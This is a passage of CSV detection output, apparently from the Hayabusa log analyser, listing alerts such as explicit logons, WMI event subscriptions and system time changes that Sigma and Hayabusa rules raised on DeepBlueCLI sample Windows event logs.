0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:45:09.380 
+09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 09:34:55.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 09:37:57.755 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 09:53:07.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:07:45.896 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:13:36.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:21:57.052 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:36:35.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:38:16.943 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 
14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:23:49.093 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : 
Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed 
Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in 